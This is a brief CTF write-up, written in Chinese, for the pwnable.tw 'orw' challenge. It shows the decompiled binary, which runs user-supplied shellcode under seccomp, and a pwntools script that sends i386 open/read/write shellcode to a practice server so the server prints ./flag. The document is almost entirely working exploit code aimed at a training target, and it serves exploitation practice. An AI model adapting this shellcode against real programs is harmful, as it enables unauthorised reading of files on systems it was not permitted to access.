【pwnable.tw】orw

32位orw，很简单没啥好说的

int __cdecl main(int argc, const char **argv, const char **envp)
{
  orw_seccomp();
  printf("Give my your shellcode:");
  read(0, &shellcode, 0xC8u);
  ((void (*)(void))shellcode)();
  return 0;
}

from pwn import *
context(arch = "i386", os = "linux", endian = "little")
context.terminal = ['tmux', 'splitw', '-h']
#io = process("./orw")
#io = remote("chall.pwnable.tw", 10001)
io = remote("node4.buuoj.cn", 25113)
elf = ELF("./orw")

#gdb.attach(io, 'b *0x08048582')
shellcode = 0x0804A060
orw = asm("""
        mov eax, 5
        mov ebx, {0}
        xor ecx, ecx
        xor edx, edx
        int 0x80

        mov ebx, eax
        mov eax, 3
        mov ecx, {1}
        mov edx, 0x50
        int 0x80

        mov eax, 4
        mov ebx, 1
        mov ecx, {2}
        mov edx, 0x50
        int 0x80
""".format(shellcode+0x39, shellcode+0x100, shellcode+0x100))

print(hex(len(orw)))
orw += b"./flag"
print(hex(len(orw)))
io.sendafter(b"shellcode:", orw)
#pause()
io.interactive()